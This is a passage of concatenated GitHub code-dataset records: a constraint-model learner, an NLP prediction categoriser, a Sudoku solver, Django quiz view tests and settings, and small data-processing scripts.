type(sols[0][0]))\n vars = np.hstack([instance.cp_vars[k].flatten() for k in instance.cp_vars])\n s = SolverLookup.get(\"ortools\", model2)\n s += Table(vars, sols)\n cnt = solveAll(s)\n # print(f\"Number of solutions: {len(sols)}\")\n return cnt * 100 / len(sols)\n\n\ndef compare_models(learned_model: Model, target_model: Model, instance):\n recall = statistic(target_model, learned_model, instance)\n precision = statistic(learned_model, target_model, instance)\n # print(f\"Precision: {precision}, Recall: {recall}\")\n return precision, recall\n\n\ndef compare_models_count(learned_model: Model, target_model: Model, cp_vars):\n s = CPM_ortools(target_model)\n cb = OrtSolutionCounter()\n s.solve(enumerate_all_solutions=True, solution_callback=cb)\n target_count = cb.solution_count()\n print(f\"target_count: {target_count}\")\n\n s = CPM_ortools(learned_model)\n cb = OrtSolutionCounter()\n s.solve(enumerate_all_solutions=True, solution_callback=cb)\n learned_count = cb.solution_count()\n print(f\"learned_count: {learned_count}\")\n\n combined_model = Model([c for c in learned_model.constraints])\n combined_model.constraints.extend([c for c in target_model.constraints])\n s = CPM_ortools(combined_model)\n cb = OrtSolutionCounter()\n s.solve(enumerate_all_solutions=True, solution_callback=cb)\n combined_count = cb.solution_count()\n print(f\"combined_count: {combined_count}\")\n\n recall = combined_count * 100 / target_count\n precision = combined_count * 100 / learned_count\n print(f\"Precision: {precision}, Recall: {recall}\")\n return precision, recall\n\n\ndef check_obective(exp, sols, objectives, verbose=False):\n if len(sols) == 0:\n print(\"No solutions to check\")\n return 1.0\n sats = []\n for i, sol in enumerate(sols):\n sat = exp(sol) == objectives[i]\n sats.append(sat)\n\n if verbose:\n if sat:\n print(f\"Sol {sol} indeed satisfies the objective {exp(sol)}\")\n else:\n print(f\"!!! Sol {sol} does not satisfy the objective {exp(sol)}\")\n print(f\"{sum(sats)} objectives satisfied out of {len(sats)}\")\n return sum(sats) * 100.0 / len(sats)\n\n\ndef strip_empty_entries(dictionary):\n new_data = {}\n for k, v in dictionary.items():\n if isinstance(v, dict):\n v = strip_empty_entries(v)\n if v not in (\"\", None, {}):\n new_data[k] = v\n return new_data\n\n\ndef filter_redundant(expr_bounds, constraints, mapping=None):\n constraints = [c for c in constraints] # take copy\n i = 0\n while i < len(constraints):\n m2 = Model(constraints[:i] + constraints[i + 1:])\n m2 += ~all(constraints[i])\n if m2.solve():\n i += 1\n else:\n del constraints[i]\n\n if mapping:\n del expr_bounds[mapping[i][0]][mapping[i][1]][mapping[i][2]]\n del mapping[i]\n\n expr_bounds = strip_empty_entries(expr_bounds)\n return expr_bounds, constraints\n\n\ndef generate_unary_sequences(n):\n def even(n):\n lst = []\n for i in range(0, n, 2):\n lst.append((i,))\n return lst\n\n def odd(n):\n lst = []\n for i in range(1, n, 2):\n lst.append((i,))\n return lst\n\n def series(n):\n lst = []\n for i in range(0, n):\n lst.append((i,))\n return lst\n\n lst = {}\n\n if even(n):\n lst[\"evenUn\"] = even(n)\n if odd(n):\n lst[\"oddUn\"] = odd(n)\n if series(n):\n lst[\"seriesUn\"] = series(n)\n return lst\n\n\ndef generate_binary_sequences(n, data=None):\n def even(n):\n lst = []\n for i in range(0, n - 2, 2):\n lst.append((i, i + 2))\n return lst\n\n def odd(n):\n lst = []\n for i in range(1, n - 2, 2):\n lst.append((i, i + 2))\n return lst\n\n def series(n):\n lst = []\n for i in range(0, n - 1):\n lst.append((i, i + 1))\n return lst\n\n def all_pairs(n):\n return list(it.combinations(range(n), r=2))\n\n lst = {}\n if even(n):\n lst[\"evenBin\"] = even(n)\n if odd(n):\n lst[\"oddBin\"] = odd(n)\n if series(n):\n lst[\"seriesBin\"] = series(n)\n if all_pairs(n):\n lst[\"allBin\"] = all_pairs(n)\n if data:\n lst[\"jsonSeq\"] = data\n return lst\n\n\ndef generalise_bounds(bounds, size, inputData):\n generalBounds = {}\n unSeq = generate_unary_sequences(size)\n binSeq = generate_binary_sequences(size, inputData)\n x, y = symbols(\"x y\")\n for b in generate_binary_expr(x, y):\n exp = str(b)\n generalBounds[exp] = {}\n for k, seq in binSeq.items():\n generalBounds[exp][k] = {}\n tmp = np.array(\n [[bounds[exp][tple][\"l\"], bounds[exp][tple][\"u\"]] for tple in seq]\n )\n generalBounds[exp][k][\"l\"] = min(tmp[:, 0])\n generalBounds[exp][k][\"u\"] = max(tmp[:, 1])\n\n for u in generate_unary_exp(x):\n exp = str(u)\n generalBounds[exp] = {}\n for k, seq in unSeq.items():\n generalBounds[exp][k] = {}\n tmp = np.array(\n [[bounds[exp][tple][\"l\"], bounds[exp][tple][\"u\"]] for tple in seq]\n )\n generalBounds[exp][k][\"l\"] = min(tmp[:, 0])\n generalBounds[exp][k][\"u\"] = max(tmp[:, 1])\n return generalBounds\n\n\ndef create_gen_model(var_bounds, genBounds, name, inputData):\n cp_vars = create_variables(var_bounds, name)\n size = len(cp_vars)\n unSeq = generate_unary_sequences(size)\n binSeq = generate_binary_sequences(size, inputData)\n x, y = symbols(\"x y\")\n m = Model()\n mapping = []\n for expr, inst in genBounds.items():\n e = sympify(expr)\n numSym = len(e.atoms(Symbol))\n if numSym == 1:\n for seq, values in inst.items():\n constraints_l = []\n constraints_u = []\n for index in unSeq[seq]:\n f = lambdify(x, e)\n cpm_e = f(cp_vars[index[0]])\n (v, _) = get_or_make_var(cpm_e)\n if \"l\" in values:\n # m += [cpm_e >= values['l']]\n constraints_l.append(cpm_e >= values[\"l\"])\n if \"u\" in values:\n # m += [cpm_e <= values['u']]\n constraints_u.append(cpm_e <= values[\"u\"])\n # print(tmp)\n if constraints_l:\n mapping.append([expr, seq, \"l\"])\n m += constraints_l\n if constraints_u:\n m += constraints_u\n mapping.append([expr, seq, \"u\"])\n else:\n for seq, values in inst.items():\n constraints_l = []\n constraints_u = []\n for index in binSeq[seq]:\n f = lambdify([x, y], e)\n cpm_e = f(cp_vars[index[0]], cp_vars[index[1]])\n (v, _) = get_or_make_var(cpm_e)\n if \"l\" in values:\n # m += [cpm_e >= values['l']]\n constraints_l.append(cpm_e >= values[\"l\"])\n if \"u\" in values:\n # m += [cpm_e <= values['u']]\n constraints_u.append(cpm_e <= values[\"u\"])\n if constraints_l:\n m += constraints_l\n mapping.append([expr, seq, \"l\"])\n if constraints_u:\n m += constraints_u\n mapping.append([expr, seq, \"u\"])\n return m, cp_vars, mapping\n\n\ndef filter_trivial(var_bounds, genBounds, size, name, inputData):\n cp_vars = create_variables(var_bounds, name)\n\n unSeq = generate_unary_sequences(size)\n binSeq = generate_binary_sequences(size, inputData)\n x, y = symbols(\"x y\")\n for expr, inst in genBounds.items():\n e = sympify(expr)\n numSym = len(e.atoms(Symbol))\n if numSym == 1:\n for seq, values in inst.items():\n lb = values[\"l\"]\n ub = values[\"u\"]\n for index in unSeq[seq]:\n f = lambdify(x, e)\n cpm_e = f(cp_vars[index[0]])\n (v, _) = get_or_make_var(cpm_e)\n if lb == v.lb:\n del genBounds[expr][seq][\"l\"]\n break\n if ub == v.ub:\n del genBounds[expr][seq][\"u\"]\n break\n else:\n for seq, values in inst.items():\n lb = values[\"l\"]\n ub = values[\"u\"]\n for index in binSeq[seq]:\n f = lambdify([x, y], e)\n cpm_e = f(cp_vars[index[0]], cp_vars[index[1]])\n (v, _) = get_or_make_var(cpm_e)\n if lb == v.lb:\n del genBounds[expr][seq][\"l\"]\n break\n if ub == v.ub:\n del genBounds[expr][seq][\"u\"]\n break\n return genBounds\n\n\nif __name__ == \"__main__\":\n import os, glob\n import pandas as pd\n\n all_files = glob.glob(os.path.join(\"results/\", \"*.json\"))\n final_output = {\"email\": \"mohit.kumar@cs.kuleuven.be\", \"name\": \"Mohit Kumar\"}\n results = []\n for f in all_files:\n tmp = json.load(open(f))\n if tmp[\"tests\"]:\n results.append(tmp)\n final_output[\"results\"] = results\n with open(f\"final_results.json\", \"w\") as f:\n json.dump(final_output, f)\n\n # df_from_each_file = (pd.read_csv(f, sep=',') for f in all_files)\n # df_merged = pd.concat(df_from_each_file, ignore_index=True)\n # df_merged.to_csv(\"merged.csv\")\n","repo_name":"mohitKULeuven/pthg21","sub_path":"learner.py","file_name":"learner.py","file_ext":"py","file_size_in_byte":20100,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"24249760438","text":"#!/usr/bin/env python3\n\nimport sys\nfrom collections import defaultdict\n\n\ndef check_inputs():\n \"\"\"The function that checks if all inputs are in right order, and all the files are present\"\"\"\n help_text = \"Arg1: Original Test File (in CONLL-U format)\\n\" \\\n \"Arg2: Final Annotations File\\n\" \\\n \"Usage: python3 {x} Arg1 Arg2\".format(x=sys.argv[0])\n if len(sys.argv) != 3:\n print(help_text)\n exit(0)\n\n\ndef align_sent_id(orig_file, annotated_file):\n \"\"\"The function that aligns sentences IDs from CONLL-U file to the annotated test data for easy debugging\"\"\"\n sent_dict = dict()\n mismatch_dict = defaultdict(dict)\n match_dict = defaultdict(dict)\n with open(orig_file, \"r\", encoding=\"utf-8\") as orig_handle:\n sent_id = \"\"\n for line in orig_handle:\n if line.startswith(\"# sent_id\"):\n sent_id = line.strip(\"\\n\").split(\" = \")[1]\n if line.startswith(\"# text\"):\n text = line.strip(\"\\n\").split(\" = \")[1]\n sent_dict[sent_id] = text\n # time to get the data\n with open(annotated_file, \"r\", encoding=\"utf-8\") as annotated_handle:\n sentence = \"\"\n a = []\n b = []\n token_id = 0\n for line in annotated_handle:\n if line == \"\\n\":\n token_id = 0\n for key in sent_dict:\n if sent_dict[key] == sentence.rstrip():\n break\n if len(a) != 0:\n temp = dict()\n temp[\"text\"] = sentence.rstrip()\n temp[\"values\"] = a\n mismatch_dict[key] = temp\n if len(b) != 0:\n temp2 = dict()\n temp2[\"text\"] = sentence.rstrip()\n temp2[\"values\"] = b\n match_dict[key] = temp2\n a = []\n b = []\n sentence = \"\"\n else:\n token, true, predict, score = line.strip(\"\\n\").split()\n sentence += token + \" \"\n if true != predict:\n tup1 = (token, token_id, true, predict, round(float(score), 4))\n a.append(tup1)\n elif true == predict:\n tup2 = (token, token_id, true, round(float(score), 4))\n b.append(tup2)\n token_id += 1\n return mismatch_dict, match_dict\n\n\ndef generate_distribution(label, structure):\n with open(\"{x}.list\".format(x=label), \"a\", encoding=\"utf-8\") as outfile:\n for key in structure.keys():\n for vals in structure[key][\"values\"]:\n if vals[2] == label and vals[3] <= 0.70:\n outfile.write(\"{x}\\n\".format(x=vals[2]))\n\n\nif __name__ == \"__main__\":\n check_inputs()\n mismatched_instances, match_instances = align_sent_id(sys.argv[1], sys.argv[2])\n\n # Implement TOKEN_ ID Universally if possible\n with open(\"mismatched.tsv\", \"a+\", encoding=\"utf-8\") as outfile:\n for key in mismatched_instances.keys():\n text = mismatched_instances[key][\"text\"]\n for vals in mismatched_instances[key][\"values\"]:\n val1, tid, val2, val3, val4 = vals\n outfile.write(\n \"{x}\\t{v1}\\t{ti}\\t{v2}\\t{v3}\\t{v4}\\t{t}\\n\".format(x=key, v1=val1, ti=tid, v2=val2, v3=val3, v4=val4,\n t=text))\n\n with open(\"matched.tsv\", \"a+\", encoding=\"utf-8\") as outfile:\n for key in match_instances.keys():\n text = match_instances[key][\"text\"]\n for vals in match_instances[key][\"values\"]:\n val1, tid, val2, val3 = vals\n outfile.write(\n \"{x}\\t{v1}\\t{ti}\\t{v2}\\t{v3}\\t{t}\\n\".format(x=key, v1=val1, ti=tid, v2=val2, v3=val3, t=text))\n\n for x in [\"S-verb\", \"S-aux\", \"O\"]:\n generate_distribution(x, match_instances)\n","repo_name":"Akshayanti/Masters-Thesis-CUNI-2020","sub_path":"AUX-vs-VERB-UDv2.4/scripts/categorise_predictions.py","file_name":"categorise_predictions.py","file_ext":"py","file_size_in_byte":3966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"43840158936","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 19 11:11:52 2020\n\n@author: nooreen\n\"\"\"\nimport sys\nsys.setrecursionlimit(111500)\n\ndef show(board):\n for i in range(len(board)):\n if i % 3 == 0:\n if i == 0:\n print(\" ┎────────┰────────┰────────┒\")\n else:\n print(\" ┠────────╂────────╂────────┨\")\n\n for j in range(len(board[0])):\n if j % 3 == 0:\n print(\" ┃\", end=\" \")\n\n if j == 8:\n print(board[i][j], \" ┃\")\n else:\n print(board[i][j], end=\" \")\n\n print(\" ┖────────┸────────┸────────┚\")\n\n\nboard = [[3, 7, 0, 5, 0, 0, 0, 0, 6],\n [0, 0, 0, 3, 6, 0, 0, 1, 2],\n [0, 0, 0, 0, 9, 1, 7, 5, 0],\n [0, 0, 0, 1, 5, 4, 0, 7, 0],\n [0, 0, 3, 0, 7, 0, 6, 0, 0],\n [0, 5, 0, 6, 3, 8, 0, 0, 0],\n [0, 6, 4, 9, 8, 0, 0, 0, 0],\n [5, 9, 0, 0, 2, 6, 0, 0, 0],\n [2, 0, 0, 0, 0, 5, 0, 6, 4]]\n\ndef exists_in_row(board,number, empty_i):\n for i in range(len(board[0])):\n if board[empty_i][i] == number:\n return False\n\ndef exists_in_column(board,number, empty_j):\n for i in range(len(board[0])):\n if board[i][empty_j] == number:\n return False\n\n\ndef check_in_column(number):\n for i in range(len(board[0])):\n return False\n\n\ndef check_in_box(number):\n for i in range(len(board[0])):\n return False\n\n\ndef valid_options_for_current_cell(board, number,current_empty_row,current_empty_column):\n \n # Check row\n for i in range(len(board[0])):\n if board[current_empty_row][i] == number and current_empty_column != i:\n return False\n # Check column\n for i in range(len(board)):\n if board[i][current_empty_column] == number and current_empty_row != i:\n return False\n # Check box\n box_x = current_empty_column // 3\n box_y = current_empty_row // 3\n\n for i in range(box_y*3, box_y*3 + 3):\n for j in range(box_x*3, box_x*3 + 3):\n if board[i][j] == number and (i, j) != current_empty_column and current_empty_row:\n return False\n\n return True\n\ndef boxposition(element):\n board_pos = 0\n if element == 0 or element <= 2:\n board_pos = 0\n if element > 2 and element < 6:\n board_pos = 3\n if element > 5 and element < 9:\n board_pos = 6\n return (board_pos)\n\n\ndef backtrack(current_empty_row, current_empty_column):\n board[current_empty_row][current_empty_column - 1] = 0\n\n\ndef find_empty(board):\n for i in range(len(board)):\n for j in range(len(board)):\n if board[i][j] == 0:\n return i, j\n\n\ndef solve(board):\n empty_slots = find_empty(board)\n if not empty_slots:\n return True\n else:\n current_empty_row, current_empty_column = empty_slots\n\n\n for number in range(1, 10):\n if valid_options_for_current_cell(board, number, current_empty_row, current_empty_column):\n board[current_empty_row][current_empty_column] = number\n\n if solve(board):\n return True\n\n board[current_empty_row][current_empty_column]=0\n return False\n\n\nshow(board);\nsolve(board);\nprint(\" Sodoku puzzle at initial state\")\nprint(\"________________________________\")\n\nshow(board);\n\nprint(\" Sodoku puzzle at final stage\")\nprint(\"________________________________\")\n\n\n","repo_name":"noor60/Soduku-Project","sub_path":"sudoku-1.py","file_name":"sudoku-1.py","file_ext":"py","file_size_in_byte":3587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"13610544127","text":"import re\nfrom nose.tools import *\n\nfrom django.contrib.auth.models import User\nfrom django.core.urlresolvers import reverse\nfrom django.test import TestCase\n\nfrom quiz.forms import EmailForm\nfrom quiz.models import Quiz, QuizResult, Question\nfrom quiz.views import redirect_to_quiz_list\n\n\nclass TestQuizListView(TestCase):\n fixtures = ['python-zen.yaml']\n # 1 quiz, 9 questions, 26 answers, 9 correct answers (one per question)\n\n def setUp(self):\n super(TestQuizListView, self).setUp()\n self.quiz = Quiz.objects.get(slug='python-zen')\n\n def test_quiz_list_view_with_single_live_quiz(self):\n response = self.client.get(reverse('quiz_list'), follow=True)\n self.assertContains(response, self.quiz.name, count=1, status_code=200)\n self.assertContains(response, self.quiz.description, count=1)\n\n def test_quiz_list_view_with_single_draft_quiz(self):\n self.quiz.status=Quiz.DRAFT\n self.quiz.save()\n response = self.client.get(reverse('quiz_list'), follow=True)\n self.assertNotContains(response, self.quiz.name, status_code=200)\n self.assertNotContains(response, self.quiz.description)\n\n def test_quiz_list_view_with_single_closed_quiz(self):\n self.quiz.status=Quiz.CLOSED\n self.quiz.save()\n response = self.client.get(reverse('quiz_list'), follow=True)\n self.assertNotContains(response, self.quiz.name, status_code=200)\n self.assertNotContains(response, self.quiz.description)\n\n def test_quiz_list_view_with_two_live_quizzes(self):\n q2 = Quiz.objects.create(\n name='Test Quiz 2',\n slug='test-quiz-2',\n description='Foobar',\n status=Quiz.LIVE\n )\n response = self.client.get(reverse('quiz_list'), follow=True)\n self.assertContains(response, self.quiz.name, count=1, status_code=200)\n self.assertContains(response, self.quiz.description, count=1)\n self.assertContains(response, q2.name, count=1, status_code=200)\n self.assertContains(response, q2.description, count=1)\n\n\nclass TestQuizDetailView(TestCase):\n fixtures = ['python-zen.yaml', 'testuser.yaml']\n # 1 quiz, 9 questions, 26 answers, 9 correct answers (one per question)\n # A single test-user, TestyMcTesterson, with password 'password'\n\n input_re = re.compile('name=\"([^\"]+)\" value=\"([^\"]+)\"')\n\n def setUp(self):\n super(TestQuizDetailView, self).setUp()\n self.quiz = Quiz.objects.get(slug='python-zen')\n self.user = User.objects.get(username='TestyMcTesterson')\n\n self.data = ({\n 'wizard_step': '0',\n '0-INITIAL_FORMS': 4,\n '0-TOTAL_FORMS': 4,\n '0-0-answers': 3,\n '0-1-answers': 4,\n '0-2-answers': 9,\n '0-3-answers': 11,\n }, {\n 'wizard_step': '1',\n '1-INITIAL_FORMS': 3,\n '1-TOTAL_FORMS': 3,\n '1-0-answers': 14,\n '1-1-answers': 16,\n '1-2-answers': 20\n }, {\n 'wizard_step': '2',\n '2-INITIAL_FORMS': 2,\n '2-TOTAL_FORMS': 2,\n '2-0-answers': 23,\n '2-1-answers': 26,\n }\n )\n\n def grab_field_data(self, response):\n \"\"\"\n Pulls the appropriate field data from the context to pass to the next\n wizard step.\n\n -- Excerpted (but modified) from actual Django Formwizard tests\n \"\"\"\n previous_fields = \"\".join([\n f.as_text() for f in response.context['previous_fields']\n ])\n fields = {'wizard_step': response.context['step0']}\n\n def grab(m):\n fields[m.group(1)] = m.group(2)\n return ''\n\n self.input_re.sub(grab, previous_fields)\n return fields\n\n def complete_quiz(self, slug):\n response = self.client.post(\n reverse('quiz_detail', args=[slug]), data=self.data[0]\n )\n assert_equal(200, response.status_code)\n data = self.grab_field_data(response)\n data.update(self.data[1])\n response = self.client.post(\n reverse('quiz_detail', args=[slug]), data=data\n )\n data = self.grab_field_data(response)\n data.update(self.data[2])\n response = self.client.post(\n reverse('quiz_detail', args=[slug]), data=data\n )\n return response\n\n def test_quiz_detail_view_with_no_inputs(self):\n response = self.client.get(\n reverse('quiz_detail', args=[self.quiz.slug]), follow=True\n )\n assert_equal(200, response.status_code)\n\n def test_quiz_detail_view_with_good_inputs_authenticated(self):\n self.assertTrue(\n self.client.login(username=self.user.username, password='password')\n )\n assert_false(QuizResult.objects.count())\n response = self.complete_quiz(self.quiz.slug)\n quiz_result = QuizResult.objects.get(\n quiz=self.quiz, user=self.user\n )\n self.assertRedirects(\n response,\n reverse('quiz_completed', args=(self.quiz.slug, quiz_result.pk)),\n status_code=302,\n target_status_code=200\n )\n assert_equal(self.user.email, quiz_result.email)\n assert_equal(quiz_result.score, self.quiz.questions.answers.maximum_score)\n assert_equal(quiz_result.score, quiz_result.maximum_score)\n assert_equal(\n set(quiz_result.answers.all()), set(self.quiz.questions.answers.correct)\n )\n\n def test_quiz_detail_redirects_for_anon_users_with_no_session_email(self):\n response = self.client.get(\n reverse('quiz_detail', args=(self.quiz.slug,)), follow=True\n )\n expected_redirect = \"%s?next=%s\" % (\n reverse('quiz_capture_email'),\n reverse('quiz_detail', args=(self.quiz.slug,))\n )\n self.assertRedirects(response, expected_redirect)\n\n def test_quiz_detail_view_with_good_inputs_unauthenticated(self):\n assert_false(QuizResult.objects.count())\n\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n # Waiting for this to land... http://code.djangoproject.com/ticket/10899\n # What SHOULD be as simple as this:\n # >>> self.client.session['email'] = 'foo@bar.com'\n # is currently this madness...\n from django.conf import settings\n from django.utils.importlib import import_module\n engine = import_module(settings.SESSION_ENGINE)\n store = engine.SessionStore()\n store.save() # we need to make load() work, or the cookie is worthless\n self.client.cookies[settings.SESSION_COOKIE_NAME] = store.session_key\n session = self.client.session\n session['email'] = 'foo@bar.com'\n session.save()\n # ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n response = self.complete_quiz(self.quiz.slug)\n quiz_result = QuizResult.objects.get(\n quiz=self.quiz, email='foo@bar.com'\n )\n self.assertRedirects(\n response,\n reverse('quiz_completed', args=(self.quiz.slug, quiz_result.pk)),\n status_code=302,\n target_status_code=200\n )\n assert not quiz_result.user\n assert_equal(quiz_result.score, self.quiz.questions.answers.maximum_score)\n assert_equal(quiz_result.score, quiz_result.maximum_score)\n assert_equal(\n set(quiz_result.answers.all()), set(self.quiz.questions.answers.correct)\n )\n\n def test_quiz_detail_for_draft_quiz_displays(self):\n self.quiz.status = Quiz.DRAFT\n self.quiz.save()\n response = self.client.get(self.quiz.get_absolute_url(), follow=True)\n assert_equal(200, response.status_code)\n\n def test_quiz_detail_for_closed_quiz_not_found(self):\n self.quiz.status = Quiz.CLOSED\n self.quiz.save()\n response = self.client.get(self.quiz.get_absolute_url(), follow=True)\n assert_equal(404, response.status_code)\n\n\nclass TestQuizCaptureEmailView(TestCase):\n fixtures = ['python-zen.yaml', 'testuser.yaml']\n # 1 quiz, 9 questions, 26 answers, 9 correct answers (one per question)\n # A single test-user, TestyMcTesterson, with password 'password'\n\n def setUp(self):\n super(TestQuizCaptureEmailView, self).setUp()\n self.quiz = Quiz.objects.get(slug='python-zen')\n self.user = User.objects.get(username='TestyMcTesterson')\n\n def test_authenticated_users_redirected_to_quiz_list(self):\n self.client.login(username=self.user.username, password='password')\n response = self.client.get(reverse('quiz_capture_email'), follow=True)\n self.assertRedirects(response, reverse('quiz_list'))\n\n def test_unauthenticated_users_not_redirected(self):\n response = self.client.get(reverse('quiz_capture_email'), follow=True)\n assert_equal(200, response.status_code)\n\n def test_emailform_success(self):\n data = {'email': 'foo@bar.com'}\n response = self.client.post(\n reverse('quiz_capture_email'), data=data, follow=True\n )\n self.assertRedirects(response, reverse('quiz_list'))\n assert_equal(data['email'], response.client.session['email'])\n response = self.client.get(\n reverse('quiz_detail', args=(self.quiz.slug,)), follow=True\n )\n assert_equal(200, response.status_code)\n\n def test_emailform_with_existing_user_email(self):\n response = self.client.post(\n reverse('quiz_capture_email'), {'email': self.user.email}, follow=True\n )\n self.assertFormError(\n response, 'form', 'email', EmailForm.EXISTING_EMAIL_ADDRESS\n )\n\n\nclass TestQuizDetailDifficulty(TestCase):\n fixtures = ['testuser.yaml']\n # A single test-user, TestyMcTesterson, with password 'password'\n\n def setUp(self):\n super(TestQuizDetailDifficulty, self).setUp()\n self.user = User.objects.get(username='TestyMcTesterson')\n self.expected = '

Step 1 of %s

'\n self.assertTrue(\n self.client.login(username=self.user.username, password='password')\n )\n\n def tearDown(self):\n super(TestQuizDetailDifficulty, self).tearDown()\n Quiz.objects.all().delete()\n Question.objects.all().delete()\n\n def test_easy_quiz_has_1_step(self):\n quiz = Quiz.objects.create(name='easy', slug='easy', status=Quiz.LIVE)\n q1 = Question.objects.create(question='foo')\n q2 = Question.objects.create(question='bar')\n quiz.questions.add(q1)\n quiz.questions.add(q2)\n response = self.client.get(\n reverse('quiz_detail', args=[quiz.slug]), follow=True\n )\n self.assertContains(response, self.expected % 1)\n\n def test_medium_quiz_has_2_steps(self):\n quiz = Quiz.objects.create(name='easy', slug='easy', status=Quiz.LIVE)\n q1 = Question.objects.create(question='foo', difficulty=Question.EASY)\n q2 = Question.objects.create(question='bar', difficulty=Question.MEDIUM)\n quiz.questions.add(q1)\n quiz.questions.add(q2)\n response = self.client.get(\n reverse('quiz_detail', args=[quiz.slug]), follow=True\n )\n self.assertContains(response, self.expected % 2)\n\n def test_hard_quiz_has_3_steps(self):\n quiz = Quiz.objects.create(name='easy', slug='easy', status=Quiz.LIVE)\n q1 = Question.objects.create(question='foo', difficulty=Question.EASY)\n q2 = Question.objects.create(question='bar', difficulty=Question.MEDIUM)\n q3 = Question.objects.create(question='bar', difficulty=Question.HARD)\n quiz.questions.add(q1)\n quiz.questions.add(q2)\n quiz.questions.add(q3)\n response = self.client.get(\n reverse('quiz_detail', args=[quiz.slug]), follow=True\n )\n self.assertContains(response, self.expected % 3)\n\n\nclass TestRedirectToQuizList(TestCase):\n fixtures = ['python-zen.yaml', 'testuser.yaml']\n # 1 quiz, 9 questions, 26 answers, 9 correct answers (one per question)\n # A single test-user, TestyMcTesterson, with password 'password'\n\n def setUp(self):\n super(TestRedirectToQuizList, self).setUp()\n self.quiz = Quiz.objects.get(slug='python-zen')\n self.user = User.objects.get(username='TestyMcTesterson')\n\n def test_redirect_works_unauthenticated(self):\n response = self.client.get(\n reverse(redirect_to_quiz_list, args=(self.quiz.slug,)), follow=True\n )\n assert_equal(200, response.status_code)\n self.assertRedirects(response, reverse('quiz_list'), status_code=301)\n\n def test_redirect_works_authenticated(self):\n self.client.login(username=self.user.username, password='password')\n response = self.client.get(\n reverse(redirect_to_quiz_list, args=(self.quiz.slug,)), follow=True\n )\n assert_equal(200, response.status_code)\n self.assertRedirects(response, reverse('quiz_list'), status_code=301)\n","repo_name":"chrischambers/django-quizzes","sub_path":"quiz/tests/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13148,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"86"} +{"seq_id":"26586138537","text":"import os\nSITE_ROOT = os.path.dirname(os.path.abspath(__file__))\nSITE_BASEURL = '/'\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nLANGUAGE_CODE = 'en-us'\nSITE_ID = 1\nUSE_I18N = False\nUSE_L10N = True\n\nMEDIA_URL = SITE_BASEURL + ''\nADMIN_MEDIA_PREFIX = '/admin/media/'\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n)\n\nROOT_URLCONF = 'urls'\n\nTEMPLATE_DIRS = (\n os.path.join(SITE_ROOT, 'templates')\n)\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.admin',\n 'django.contrib.admindocs',\n\n 'image',\n\n\t# south, for migrations\n\t'south',\n)\n\nIMAGE_ID_OFFSET = 0\nLOGIN_REDIRECT_URL = '/'\nLOGIN_URL = '/login'\n\n# import local settings (if it exists) and override these things.\ntry:\n from local_settings import *\nexcept:\n pass\n\n","repo_name":"mjlee156/imghost","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"86"} +{"seq_id":"34015289016","text":"import numpy as np\n#import pandas as pd\nimport csv, pickle #string, re\n\ndef load_obj(name ):\n with open('obj/' + name + '.pkl', 'rb') as f:\n return pickle.load(f)\n\ndef save_obj(obj, name ):\n with open('obj/'+ name + '.pkl', 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\n\nfile_in = open('gps_test.csv', 'r',encoding = \"ISO-8859-1\")\ndata = csv.reader(file_in)\ntxt = ''\nstatuses = []\nlabels = []\nlengths = []\n\nfor row in data:\n labels.append([row[0:5]])\n statuses.append(row[6])\n lengths.append(len(row[6]))\n txt += row[6]\n\nmaxlen = 1024\nchars = sorted(set(txt))\nprint(chars)\n\n","repo_name":"MehradSm/Char-Level-Models-to-Predict-Gender","sub_path":"Preprocessing/csv_to_XY.py","file_name":"csv_to_XY.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"43009521908","text":"'''\n\tIdentifies the possible word combinations\n\n\n\t\n'''\n\nimport numpy as np\nimport csv\nimport time\n\n# Node class in the form of linked lists\n# class Node: \n \n# # Function to initialize the node object \n# def __init__(self, data): \n# self.data = data # Assign data \n# self.next = None # Initialize \n# # next as null \n\nclass TeluguPoti():\n\n\tdef __init__(self):\n\n\t\tself.dictionary = set()\n\t\twith open('english_filtered.csv') as file:\n\t\t\tfile = csv.reader(file, delimiter=',')\n\t\t\tline_count = 0\n\t\t\tfor row in file:\n\t\t\t\tfor i in range(len(row)):\n\t\t\t\t\tself.dictionary.add(row[i])\n\t\t\t\tline_count += 1\n\t\t\tprint('Processed '+str(line_count)+' lines.')\n\t\t# self.grid = [['స','క','వి','త'],\n\t\t# \t\t['చా','మ','ర','ము'],\n\t\t# \t\t['కు','ల','కం','న'],\n\t\t# \t\t['కి','ము','ళ','గ']]\n\t\t# self.grid = [['కు','కూ','ల','ము'],\n\t\t# \t\t\t['కు','ఠా','ర','ము'],\n\t\t# \t\t\t['కు','డ','ప','ము'],\n\t\t# \t\t\t['కు','పి','తు','డు']]\n\t\tself.grid = 